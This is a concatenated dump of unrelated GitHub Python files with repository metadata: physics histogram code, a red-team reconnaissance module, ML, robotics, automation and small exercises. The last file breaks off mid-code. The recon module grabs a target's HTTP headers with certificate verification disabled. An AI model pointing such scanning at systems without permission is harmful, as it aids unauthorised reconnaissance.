{} # dictionary of histograms\n    for label in histLabels:\n        histname = name + selection + unc + label\n        hists[histname] = ROOT.TH1D(histname,\"\",nbins,array('d',list(xbins)))\n    for label in histSysLabels:\n        for ptratioLabel in ptratioLabels:\n            for uncLabel in statUncLabels:\n                histname = name + selection + unc + label + ptratioLabel + uncLabel\n                hists[histname] = ROOT.TH1D(histname,\"\",nbins,array('d',list(xbins)))\n\n    for sampleName in samples: \n        sample = samples[sampleName]\n        histsample = sample.CreateHistosTauNu(var,unc,xbins,selection)\n        \n        for label in 
histLabels:\n histname = name + selection + unc + label\n histsamplename = sample.sampleName + selection + unc + label\n hists[histname].Add(hists[histname],histsample[histsamplename],1.,1.)\n for label in histSysLabels:\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n histname = name + selection + unc + label + ptratioLabel + uncLabel\n histsamplename = sample.sampleName + selection + unc + label + ptratioLabel + uncLabel\n hists[histname].Add(hists[histname],histsample[histsamplename],1.,1.)\n\n return hists\n\ndef createBins(nbins,xmin,xmax):\n binwidth = (xmax-xmin)/float(nbins)\n bins = []\n for i in range(0,nbins+1):\n xb = xmin + float(i)*binwidth\n bins.append(xb)\n return bins\n\ndef zeroBinErrors(hist):\n nbins = hist.GetNbinsX()\n for i in range(1,nbins+1):\n hist.SetBinError(i,0.)\n\ndef createUnitHisto(hist,histName):\n nbins = hist.GetNbinsX()\n unitHist = hist.Clone(histName)\n for i in range(1,nbins+1):\n x = hist.GetBinContent(i)\n e = hist.GetBinError(i)\n if x>0:\n rat = e/x\n unitHist.SetBinContent(i,1.)\n unitHist.SetBinError(i,rat)\n\n return unitHist\n\ndef dividePassProbe(passHist,failHist,histName):\n nbins = passHist.GetNbinsX()\n hist = passHist.Clone(histName)\n for i in range(1,nbins+1):\n xpass = passHist.GetBinContent(i)\n epass = passHist.GetBinError(i)\n xfail = failHist.GetBinContent(i)\n efail = failHist.GetBinError(i)\n xprobe = xpass+xfail\n ratio = 1\n eratio = 0\n if xprobe>1e-4:\n ratio = xpass/xprobe\n dpass = xfail*epass/(xprobe*xprobe)\n dfail = xpass*efail/(xprobe*xprobe)\n eratio = math.sqrt(dpass*dpass+dfail*dfail)\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\ndef divideHistos(numHist,denHist,histName):\n nbins = numHist.GetNbinsX()\n hist = numHist.Clone(histName)\n for i in range(1,nbins+1):\n xNum = numHist.GetBinContent(i)\n eNum = numHist.GetBinError(i)\n xDen = denHist.GetBinContent(i)\n eDen = denHist.GetBinError(i)\n ratio = 1\n eratio = 0\n if xNum>1e-7 and xDen>1e-7:\n ratio = xNum/xDen\n rNum = eNum/xNum\n rDen = eDen/xDen\n rratio = math.sqrt(rNum*rNum+rDen*rDen)\n eratio = rratio * ratio\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\ndef histoRatio(numHist,denHist,histName):\n nbins = numHist.GetNbinsX()\n hist = numHist.Clone(histName)\n for i in range(1,nbins+1):\n xNum = numHist.GetBinContent(i)\n eNum = numHist.GetBinError(i)\n xDen = denHist.GetBinContent(i)\n ratio = 1\n eratio = 0\n if xNum>1e-7 and xDen>1e-7:\n ratio = xNum/xDen\n eratio = eNum/xDen\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\n \nclass TauNuCuts:\n def __init__(self,**kwargs):\n self.metCut = kwargs.get('metCut',120.)\n self.mtLowerCut = kwargs.get('mtLowerCut',200.)\n self.mtUpperCut = kwargs.get('mtUpperCut',99999999.)\n self.etaCut = kwargs.get('etaCut',2.3)\n self.ptLowerCut = kwargs.get('ptLowerCut',100.)\n self.ptUpperCut = kwargs.get('ptUpperCut',99999999.)\n self.metdphiCut = kwargs.get('metdphiCut',2.8)\n\nclass FakeFactorHighPt:\n\n def __init__(self,filename):\n print('')\n print('Loading fake factors from file',filename,\" >>>>>\")\n self.fileName = filename\n self.fileFF = ROOT.TFile(self.fileName,\"READ\")\n self.hists = {}\n self.labels = ['dijets','wjets']\n #self.ptbins = ['ptratioLow','ptratioMedium','ptratioHigh']\n self.ptbins = ['ptratioLow','ptratioHigh']\n for ptbin in self.ptbins:\n for label in self.labels: \n name = 'data_' + label + \"_\" + ptbin\n self.hists[name] = self.fileFF.Get(name)\n 
print(name,self.hists[name])\n name = 'mc_wjets_' + ptbin\n self.hists[name] = self.fileFF.Get(name)\n print(name,self.hists[name])\n\n def getWeight(self,pttau,ptratio,label):\n ptlabel = 'ptratioLow'\n # if ptratio>=ptratioThresholds[0] and ptratio<ptratioThresholds[1]: ptlabel = 'ptratioMedium'\n # if ptratio>=ptratioThresholds[1]: ptlabel = 'ptratioHigh'\n if ptratio>=ptratioThreshold: ptlabel = 'ptratioHigh'\n name = label + \"_\" + ptlabel\n x = pttau\n nbins = self.hists[name].GetNbinsX()\n lowerEdge = self.hists[name].GetBinLowEdge(1)\n upperEdge = self.hists[name].GetBinLowEdge(nbins+1)\n if pttau<lowerEdge: x = lowerEdge+0.001\n if pttau>upperEdge: x = upperEdge-0.001\n weight = self.hists[name].GetBinContent(self.hists[name].FindBin(x))\n error = self.hists[name].GetBinError(self.hists[name].FindBin(x))\n return weight,error\n\nclass sampleHighPt:\n\n def __init__(self,basefolder,era,channel,samplename,isdata,**kwargs):\n filename = basefolder + \"/\" + era + \"/\" + channel + \"/\" + samplename + \".root\"\n self.additionalCut = kwargs.get('additionalCut', '')\n self.sampleName = samplename\n self.sampleFile = ROOT.TFile(filename,\"READ\")\n #self.sampleTree = self.sampleFile.Get(\"tree\")\n self.norm = 1.0\n self.isdata = isdata\n if isdata:\n self.norm = 1.0\n else:\n xsecSamples = eraSamples[era]\n xsec = xsecSamples[samplename]\n histsumw = self.sampleFile.Get(\"weightedEvents\")\n sumw = histsumw.GetSumOfWeights()\n lumi = eraLumi[era]\n self.norm = xsec*lumi/sumw\n print('sample >>> ',self.sampleName,self.norm,self.additionalCut)\n\n def CreateHisto(self,var,weight,cut,bins,name):\n\n nbins = len(bins)-1\n histname = self.sampleName+\"_\"+name\n hist = ROOT.TH1D(histname,\"\",nbins,array('d',list(bins)))\n cutstring = weight+\"*(\"+cut+\")\"\n tree = self.sampleFile.Get(\"tree\")\n if (self.additionalCut!=''):\n cutstring = weight+\"*(\"+cut+\"&&\"+self.additionalCut+\")\"\n tree.Draw(var+\">>\"+histname,cutstring)\n hist.Scale(self.norm)\n return hist\n\n def SetTauNuConfig(self,fakeFactorHighPt,WP,tauNuCuts):\n self.fakeFactorHighPt = fakeFactorHighPt\n self.WP_index = tauIntWPs[WP]\n self.tauNuCuts = tauNuCuts\n\n def CreateHistosTauNu(self,var,unc,bins,selection):\n\n print(\"Running over\",self.sampleName)\n tree = self.sampleFile.Get(\"tree\")\n\n # initialization\n nbins = len(bins)-1\n wp_index = self.WP_index\n cuts = self.tauNuCuts\n fakeFactor = self.fakeFactorHighPt\n\n # creating histograms \n hists = {}\n for label in histLabels:\n name = self.sampleName + selection + unc + label\n hists[name] = ROOT.TH1D(name,\"\",nbins,array('d',list(bins)))\n for label in histSysLabels:\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n name = self.sampleName + selection + unc + label + ptratioLabel + uncLabel\n hists[name] = ROOT.TH1D(name,\"\",nbins,array('d',list(bins)))\n\n # floats\n weight = np.zeros(1,dtype='f')\n pt_1 = np.zeros(1,dtype='f')\n eta_1 = np.zeros(1,dtype='f')\n metdphi_1 = np.zeros(1,dtype='f')\n mt_1 = np.zeros(1,dtype='f')\n met = np.zeros(1,dtype='f')\n jpt_ratio_1 = np.zeros(1,dtype='f')\n m_1 = np.zeros(1,dtype='f')\n\n # booleans\n mettrigger = np.zeros(1,dtype='?')\n metfilter = np.zeros(1,dtype='?')\n extramuon_veto = np.zeros(1,dtype='?')\n extraelec_veto = np.zeros(1,dtype='?')\n extratau_veto = np.zeros(1,dtype='?')\n \n # integers\n njets = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSe_1 = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSmu_1 = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSjet_1 = np.zeros(1,dtype='i')\n 
genmatch_1 = np.zeros(1,dtype='i')\n\n # branches -> \n # floats \n tree.SetBranchAddress('met',met)\n tree.SetBranchAddress('metdphi_1',metdphi_1)\n tree.SetBranchAddress('mt_1',mt_1)\n tree.SetBranchAddress('pt_1',pt_1)\n tree.SetBranchAddress('m_1',m_1)\n tree.SetBranchAddress('weight',weight)\n tree.SetBranchAddress('eta_1',eta_1)\n tree.SetBranchAddress('jpt_ratio_1',jpt_ratio_1)\n\n # booleans\n tree.SetBranchAddress('mettrigger',mettrigger)\n tree.SetBranchAddress('metfilter',metfilter)\n tree.SetBranchAddress('extramuon_veto',extramuon_veto)\n tree.SetBranchAddress('extraelec_veto',extraelec_veto)\n tree.SetBranchAddress('extratau_veto',extratau_veto)\n\n # integers\n tree.SetBranchAddress('njets',njets)\n tree.SetBranchAddress('idDeepTau2017v2p1VSe_1',idDeepTau2017v2p1VSe_1)\n tree.SetBranchAddress('idDeepTau2017v2p1VSmu_1',idDeepTau2017v2p1VSmu_1)\n tree.SetBranchAddress('idDeepTau2017v2p1VSjet_1',idDeepTau2017v2p1VSjet_1)\n if not self.isdata: tree.SetBranchAddress(\"genmatch_1\",genmatch_1)\n\n nentries = tree.GetEntries()\n\n # run over entries\n for entry in range(0,nentries):\n tree.GetEntry(entry)\n\n # mc selection\n # 0 - select genuine taus\n # 1 - select jet->tau fakes\n # 2 - select not jet->tau fakes\n if not self.isdata:\n if selection=='_tau' and genmatch_1[0]!=5: continue # genuine taus\n if selection=='_fake' and genmatch_1[0]!=0: continue # jet->tau fakes\n if selection=='_notFake' and genmatch_1[0]==0: continue # not jet->tau fakes\n\n # met filters, trigger, vetos\n if not metfilter[0]: continue\n if not mettrigger[0]: continue\n if extraelec_veto[0]: continue\n if extramuon_veto[0]: continue\n if extratau_veto[0]: continue\n if njets[0]!=0: continue\n\n # kinematic cuts\n if pt_1[0]<cuts.ptLowerCut: continue\n if pt_1[0]>cuts.ptUpperCut: continue\n if math.fabs(eta_1[0])>cuts.etaCut: continue\n if mt_1[0]<cuts.mtLowerCut: continue\n if mt_1[0]>cuts.mtUpperCut: continue\n if metdphi_1[0]<cuts.metdphiCut: continue\n if met[0]<cuts.metCut: continue\n\n # tau discriminator against e and mu and jet\n if idDeepTau2017v2p1VSe_1[0]<4: continue\n if idDeepTau2017v2p1VSmu_1[0]<1: continue\n if idDeepTau2017v2p1VSjet_1[0]<1: continue\n\n variable = mt_1[0]\n if var=='pt_1': variable = pt_1[0]\n if var=='eta_1': variable = eta_1[0]\n if var=='met': variable = met[0]\n if var=='m_1': variable = m_1[0]\n\n # signal region\n if idDeepTau2017v2p1VSjet_1[0]>=wp_index:\n name = self.sampleName + selection + unc\n hists[name].Fill(variable,weight[0])\n\n # Sideband region (VVVLoose and not Loose)\n if idDeepTau2017v2p1VSjet_1[0]<4:\n name = self.sampleName + selection + unc + \"_SB\"\n hists[name].Fill(variable,weight[0])\n \n # find label\n refRatioLabel, refUncLabel = extractBinLabels(pt_1[0],jpt_ratio_1[0])\n refLabel = refRatioLabel+refUncLabel\n\n # applying FF and systematics\n for label in ['mc_wjets','data_wjets','data_dijets']:\n weightFF,errorFF = fakeFactor.getWeight(pt_1[0],jpt_ratio_1[0],label)\n name = self.sampleName + selection + unc + '_' + label\n hists[name].Fill(variable,weight[0]*weightFF)\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n currentLabel = ptratioLabel+uncLabel\n name = self.sampleName + selection + unc + \"_\" + label + currentLabel\n if currentLabel==refLabel: \n hists[name].Fill(variable,weight[0]*(weightFF+errorFF))\n else:\n hists[name].Fill(variable,weight[0]*weightFF)\n\n for hist in hists:\n hists[hist].Scale(self.norm)\n\n return 
hists\n","repo_name":"cms-tau-pog/TauFW","sub_path":"Fitter/python/HighPT/utilsHighPT.py","file_name":"utilsHighPT.py","file_ext":"py","file_size_in_byte":22076,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"32433639658","text":"#!/usr/bin/env python3\n\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nC = '\\033[36m' # cyan\nW = '\\033[0m' # white\nY = '\\033[33m' # yellow\n\ndef headers(target, output, data):\n\tresult = {}\n\tprint ('\\n' + Y + '[!] Headers :' + W + '\\n')\n\ttry:\n\t\trqst = requests.get(target, verify=False, timeout=10)\n\t\tfor k, v in rqst.headers.items():\n\t\t\tprint (G + '[+]' + C + ' {} : '.format(k) + W + v)\n\t\t\tif output != 'None':\n\t\t\t\tresult.update({k:v})\n\texcept Exception as e:\n\t\tprint('\\n' + R + '[-]' + C + ' Exception : ' + W + str(e) + '\\n')\n\t\tif output != 'None':\n\t\t\tresult.update({'Exception':str(e)})\n\n\tif output != 'None':\n\t\theader_output(output, data, result)\n\ndef header_output(output, data, result):\n\tdata['module-Headers'] = result","repo_name":"ryanmrestivo/red-team","sub_path":"Information-Gathering/FinalRecon/modules/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"22001505015","text":"\"\"\"\nPredicts the class of a given image using a TinyVGG model\n\"\"\"\nimport torch\nimport torchvision\nimport argparse\nimport model_builder\n \nparser = argparse.ArgumentParser()\nparser.add_argument(\"--image\", help=\"Target image to predict the class of\")\nparser.add_argument(\"--model_path\", default=\"models/05_pytorch_going_modular_tinyvgg_args.pth\", \n type=str, help=\"Target model to use for the class prediction\")\n\nargs = parser.parse_args()\n\nIMG_PATH = args.image\nMODEL_PATH = args.model_path\nclass_names = [\"pizza\", \"steak\", \"sushi\"]\n\ndef load_model(path=MODEL_PATH):\n model = model_builder.TinyVGG(\n in_shape=3,\n hidden=10,\n out_shape=3\n )\n model.load_state_dict(torch.load(path))\n return model\n\ndef predict_on_image(image_path=IMG_PATH, model_path=MODEL_PATH):\n model = load_model(MODEL_PATH)\n image = torchvision.io.read_image(str(image_path)).type(torch.float32)\n image = image / 255.\n transform = torchvision.transforms.Resize(size=(64, 64))\n image = transform(image)\n \n model.eval()\n with torch.inference_mode():\n pred_logits = model(image.unsqueeze(dim=0))\n pred_probs = torch.softmax(pred_logits, dim=1)\n pred_label = torch.argmax(pred_probs, dim=1)\n pred_label_class = class_names[pred_label]\n \n print(f\"[INFO] Pred class: {pred_label_class}, Pred prob: {pred_probs.max():.3f}\")\n \nif __name__ == \"__main__\":\n predict_on_image()\n","repo_name":"RumiaGIT/pytorch-research","sub_path":"modular_scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5940096059","text":"# You must write an algorithm that runs in O(n) time.\n\nclass Solution:\n def longestConsecutive(self, nums):\n nums = {i: 0 for i in nums}\n nums = dict(sorted(nums.items()))\n cs = []\n count = 0\n\n for k,v in nums.items():\n if k+1 in nums:\n count += 1\n else:\n cs.append(count+1)\n count = 0\n\n if len(cs) == 0:\n return 0\n\n return max(cs)\n\n\n\n\n\n\n\n\nnums = [100, 4, 200, 1, 3, 
2]\nprint(Solution().longestConsecutive(nums))\n","repo_name":"Jeonghoon2/Coding-once-a-day","sub_path":"파이썬 (Python)/leetCode/Medium/128_Longest Consecutive Sequence.py","file_name":"128_Longest Consecutive Sequence.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"12229856748","text":"from django.contrib import admin\nfrom .models import Post, Feedback\n\nclass PostAdmin(admin.ModelAdmin):\n    list_display = (\"title\", \"slug\", \"user\", \"date\", )\n    list_filter = (\"date\", )\n    search_fields = [\"title\", \"body\"]\n    prepopulated_fields = {\"slug\": (\"title\",)}\n\n'''class FeedbackAdmin(admin.ModelAdmin):\n    list_display = (\"subject\", \"email\")\n    list_filter = (\"date\",)\n    search_fields = [\"subject\", \"email\"]\nadmin.site.register(Feedback, FeedbackAdmin)'''\nadmin.site.register(Post, PostAdmin)\n","repo_name":"Patrick-Abugu/BrightMass","sub_path":"Site/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"31578235800","text":"from sys import displayhook\r\nimport pyautogui\r\nimport pyperclip\r\nimport time\r\n\r\npyautogui.click(x=610, y=740) #starting the browser.\r\ntime.sleep(3)\r\npyautogui.click(x=589, y=45) #selecting the search bar.\r\npyperclip.copy(\"https://docs.google.com/spreadsheets/d/1HSFFI4v7ju8qmy4eW12hdl1_BwkEImSw/edit#gid=1634402548\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"enter\") #opening the sales report\r\ntime.sleep(5)\r\npyautogui.click(x=101, y=115)\r\ntime.sleep(2)\r\npyautogui.click(x=215, y=390)\r\ntime.sleep(2)\r\npyautogui.click(x=467, y=393)\r\ntime.sleep(2)\r\npyautogui.click(x=513, y=446) #downloading the report\r\ntime.sleep(3)\r\n\r\nimport pandas as pd\r\ntabela= pd.read_excel(r\"C:\\\\Users\\\\gabri\\\\Downloads\\\\Vendas - Dez.xlsx\") #importing the data\r\ndisplayhook(tabela)\r\n\r\nfaturamento= tabela[\"Valor Final\"].sum()\r\nquantidade= tabela[\"Quantidade\"].sum()\r\n\r\n#Sending the email!\r\npyautogui.click(x=335, y=48)\r\npyperclip.copy(\"https://mail.google.com/mail/u/0/#inbox\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"enter\")\r\ntime.sleep(4)\r\npyautogui.click(x=85, y=159)\r\ntime.sleep(3)\r\npyperclip.copy(\"emailficticio@gmail.com\")\r\npyautogui.hotkey('ctrl', \"v\")\r\npyautogui.press(\"tab\")\r\ntime.sleep(2)\r\npyperclip.copy(\"Relatório de Vendas\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"tab\")\r\n\r\ntexto= f\"\"\"\r\nPrezados, bom dia\r\n\r\nO faturamento de ontem foi de: R${faturamento:,.2f}\r\nA quantidade de produtos foi de: {quantidade:}\r\n\r\nAbs\r\nGabrielly Castro\"\"\"\r\n\r\npyperclip.copy(texto)\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\ntime.sleep(2)\r\npyautogui.press(\"tab\")\r\npyautogui.press(\"enter\")\r\ntime.sleep(5)\r\npyautogui.click(x=1349, y=9)","repo_name":"Sterwinxs/Automacao-Phyton","sub_path":"email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"74248176694","text":"import sys\nfrom datetime import datetime\nimport requests\n\n\nnow = datetime.now()\nsuccessMsg = \"Product: AdminPanel -- Installation completed successfully.\"\nnumberOfTimesToReadFile = 0\nsuccessMsgFound = False\n\nlogFile = open(\"C:\\\\tmp\\\\admin_panel_packge.log\", encoding='UTF-16LE')\nlines = 
logFile.readlines()\n\nfor line in lines:\n    if successMsg in line:\n        print(\"Success message FOUND!!\")\n        successMsgFound = True\nlogFile.close()\n\n# if successMsgFound:\n#     print(\"Found after reading file \" + str(numberOfTimesToReadFile) + \" times\")\n#     break\n\nhtmFile = open(\"c:\\\\tmp\\\\reports\\\\report.html\",\"w\")\nhtmFile.write(\"\"\"<!DOCTYPE html>\n    <html>\n    <head>\n    <style>\n    table, th, td {\n        border-style: solid;\n        border-color: #2F4F4F;\n        border-width: 1px;\n    }\n    </style>\n    </head>\n    <body>\n\n    <h2>Test for Admin Panel</h2>\n\n\n    <table style=\"width:50%\">\n    <tr bgcolor = #5F9EA0>\n        <th>Application</th>\n        <th>Timestamp</th>\n        <th>Status</th>\n    </tr>\n    <tr>\n        <td bgcolor = #B0E0E6>Admin Panel</td> \n        \"\"\")\n\nstring = \"This is just a test run at: \" + str(now)\n# Timestamp\nhtmFile.write(\"<td bgcolor = #B0E0E6>\" + str(now) + \"</td>\")\nresponse = None\ntry:\n    response = requests.get(\"http://localhost/Admin/\")\n\nexcept Exception as e:\n    print(e)\nfinally:\n    print(\"Writing HTML Report\")\n    if response:\n        status = response.status_code\n        print(\"Response: \" + str(response))\n        # status\n        if status == 200:\n            htmFile.write(\"<td bgcolor = #00FA9A>Success</td>\")\n        else:\n            htmFile.write(\"<td bgcolor = #FFA07A>Fail</td>\")\n    else:\n        htmFile.write(\"<td bgcolor = #FFA07A>Fail</td>\")\n\nhtmFile.write(\"\"\"\n    </tr>\n    </table>\n\n    </body>\n    </html>\"\"\")\n\nhtmFile.close()\n","repo_name":"kartikeyachauhan/test-repo-redmoon","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"17809570412","text":"import numpy as np\nfrom gym import Env\nfrom gym.spaces import Box\nimport pybullet as p\nimport pybullet_data as pd\n\n\nclass WalkerEnv(Env):\n    def __init__(self, render=False, max_reward=2000, ttl=1000):\n        self.position = None\n        self.max_reward = max_reward\n        # time to live for our agent\n        self.ttl = ttl\n\n        # use the GUI only when rendering is requested, otherwise run headless\n        if render:\n            method = p.GUI\n        else:\n            method = p.DIRECT\n\n        # connect to the physics server, set our parameters and load models\n        client_id = p.connect(method)\n        p.setAdditionalSearchPath(pd.getDataPath())\n        p.setGravity(0, 0, -9.8)\n\n        # time needs a small adjustment\n        p.setTimeStep(0.0001)\n        plane_id = p.loadURDF('plane.urdf')\n        self.start_position = [0, 0, -0.4]\n        self.start_rotation = [0, 0, 0, 1]\n        self.joints_angles = np.array([0 for _ in range(4)], dtype=np.float32)\n        self.object_id = p.loadURDF('robot.urdf', self.start_position, self.start_rotation)\n\n        self.n_joints = p.getNumJoints(self.object_id)\n\n        joint_constraints = [[p.getJointInfo(self.object_id, idx)[8] for idx in range(self.n_joints)],\n                             [p.getJointInfo(self.object_id, idx)[9] for idx in range(self.n_joints)]]\n\n        # this section will be refactored and corrected\n        ###############################################\n\n        # rotation values for each joint\n        self.action_space = Box(low=np.array(joint_constraints[0]),\n                                high=np.array(joint_constraints[1]))\n\n        # joint rotations, xyz position of body\n        self.observation_space = Box(low=np.concatenate([joint_constraints[0], [-10, -10, 0]]),\n                                     high=np.concatenate([joint_constraints[1], [10, 10, 1]]))\n\n        self.multi_dof_joints = [idx for idx in range(self.n_joints) if p.getJointInfo(self.object_id, idx)[2] != 0]\n        self.single_dof_joints = [idx for idx in range(self.n_joints) if p.getJointInfo(self.object_id, idx)[2] == 0]\n\n        ###############################################\n\n    def step(self, action=None):\n        # apply action\n        if 
action is not None:\n            p.setJointMotorControlArray(self.object_id, [i for i in range(self.n_joints)], p.POSITION_CONTROL, action)\n        p.stepSimulation()\n\n        # generate observation\n        multi_joints_or = np.array(\n            [p.getJointStateMultiDof(self.object_id, idx)[0] for idx in self.multi_dof_joints]).flatten()\n        rev_joints_or = np.array([p.getJointState(self.object_id, idx)[0] for idx in self.single_dof_joints])\n\n        self.position = p.getBasePositionAndOrientation(self.object_id)[0]\n\n        observation = np.concatenate([multi_joints_or, rev_joints_or, self.position], dtype=np.float32)\n\n        # calculate reward\n        # this will be changed to better suit our environment\n        reward = -(self.position[0] ** 2) + (2 * self.position[1]) ** 2 - ((self.position[2] - 0.4) ** 2)\n        if reward >= self.max_reward:\n            done = True\n        else:\n            done = False\n\n        # gym environments return observation, reward, done (True once the terminal state is reached), and an info dict\n        return observation, reward, done, {}\n\n    def reset(self):\n        p.removeBody(self.object_id)\n        # reload the same model that __init__ uses\n        self.object_id = p.loadURDF('robot.urdf', self.start_position, self.start_rotation)\n\n    def close(self):\n        p.disconnect()\n\n    def render(self, mode=\"human\"):\n        # we do nothing here because we pass render argument when creating an instance of environment\n        pass\n","repo_name":"8bocian/SmallerProjects","sub_path":"RoboticsRelated/BipedalRobot/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"42423153716","text":"\"\"\"\nGiven two integers a and b, return the sum of the two integers without using the operators + and -.\n\nnums and res in 32-bit int.\n\nExample 1:\n\nInput: a = 1, b = 2\nOutput: 3\nExample 2:\n\nInput: a = 2, b = 3\nOutput: 5\n\"\"\"\n\ndef getSum(a: int, b: int) -> int:\n    # 32 bits integer max\n    MAX = 0x7FFFFFFF\n    # 32 bits integer min\n    MIN = 0x80000000\n    \n    mask = 0xFFFFFFFF\n    \n    while b!=0: \n        a, b = (a ^ b) & mask, ((a&b) << 1)&mask\n    \n    \n    return a if a<= MAX else ~(a^mask) ","repo_name":"AlokPratapSingh22/Blind75","sub_path":"sumOfTwoNumbers.py","file_name":"sumOfTwoNumbers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"5715209279","text":"import time\nimport board\nimport busio\nimport adafruit_ads1x15.ads1115 as ADS\nimport RPi.GPIO as GPIO\nfrom adafruit_ads1x15.analog_in import AnalogIn\nSensor = 0.0 #Variable holding the reading from the US016 ultrasonic sensor\nGPIO.setmode(GPIO.BCM) \nGPIO.setup(12,GPIO.OUT)\npwm12=GPIO.PWM(12,490) #GPIO 12 configured as PWM at 490Hz (main tank pump)\npwm12.start(0)\nGPIO.setup(13,GPIO.OUT)\npwm13=GPIO.PWM(13,490) #GPIO 13 configured as PWM at 490Hz (auxiliary tank pump)\npwm13.start(0)\ni2c = busio.I2C(board.SCL, board.SDA) #ADS1115 ADC setup\nads = ADS.ADS1115(i2c)\nchan = AnalogIn(ads, ADS.P0)\nwhile True:\n    Sensor = round(chan.voltage,3) #Read the conditioned sensor voltage\n    if (Sensor <=0.006): #If the sensor value is at or below 0.006, stop the drain pumps\n        pwm13.ChangeDutyCycle(0)\n        pwm12.ChangeDutyCycle(0)\n    else: \n        pwm13.ChangeDutyCycle(100) #If the sensor value is above 0.006, run the drain pump\n        pwm12.ChangeDutyCycle(0)\n    
","repo_name":"Uniminutoarduino/SmartLabsUniminuto-GOLC","sub_path":"ControlSystems/Codetoemptytank.py","file_name":"Codetoemptytank.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5631585336","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n lst = list(map(int, input().split()))\n sum_num = 0\n for i in lst:\n sum_num += i\n sum_avg = round(sum_num/10)\n\n print(f'#{tc} {sum_avg}')","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/2071_평균값 구하기/2071_평균값 구하기.py","file_name":"2071_평균값 구하기.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8449769304","text":"from django.shortcuts import render\nfrom plotly.offline import plot\nimport plotly.graph_objects as go\n# Create your views here.\nimport datetime\nimport numpy as np\n\n\ndef home(request):\n def scatter():\n np.random.seed(1)\n\n programmers = ['Alex','Nicole','Sara','Etienne','Chelsea','Jody','Marianne']\n\n base = datetime.datetime.today()\n dates = base - np.arange(180) * datetime.timedelta(days=1)\n z = np.random.poisson(size=(len(programmers), len(dates)))\n\n fig = go.Figure(data=go.Heatmap(\n z=z,\n x=dates,\n y=programmers,\n colorscale='Viridis'))\n\n fig.update_layout(\n title='GitHub commits per day',\n xaxis_nticks=36)\n\n plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n return plot_div\n\n context ={\n 'plot1': scatter()\n }\n\n return render(request, 'home/welcome.html', context)","repo_name":"MattiaCarolo/django-dash","sub_path":"zzz/plsite/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2325077596","text":"# Integer checker - more advanced\ndef calculate():\n valid = False\n while not valid:\n try:\n num = float(input(\"Enter participant's time: \"))\n if isinstance(num, float):\n valid = True\n return num\n except ValueError:\n print(\"That is not a number\")\n\n\ntime = calculate()\nprint(f\"The test number is {time}\")\n\n\n# Check for valid string input - eg name\ndef string_checker(question):\n error = \"Can't be a number or blank\\n\"\n while True:\n to_test = input(question)\n if not to_test.isalpha():\n print(error)\n continue\n else:\n return to_test\n\n\nname = string_checker(\"Please enter participant name: \")\n","repo_name":"amobiless/Assessment","sub_path":"04_number_checker_v2.py","file_name":"04_number_checker_v2.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29630237331","text":"import numpy as np\n\nclass KMeans_Self:\n def __init__(self,K, iters=10):\n self.K = K\n self.iters = iters\n\n def createCenter(self,data):\n centers = []\n maxRange = np.max(data,axis=1)\n for _ in range(self.K):\n x = np.random.uniform(low=0,high=maxRange[0],size=1)\n y = np.random.uniform(low=0,high=maxRange[1],size=1)\n centers.append([int(x),int(y)])\n return np.array(centers)\n\n def distance(self,centers,data):\n res = np.zeros([data.shape[0],self.K])\n for i in range(self.K):\n res[:,i] = np.sqrt((centers[i,0]-data[:,0])**2+(centers[i,1]-data[:,1])**2)\n return res\n\n def getRnk(self,dis): \n for i in range(dis.shape[0]):\n dis[i] = dis[i] / np.max(dis[i])\n\n dis[dis<1] = 0\n return dis\n \n 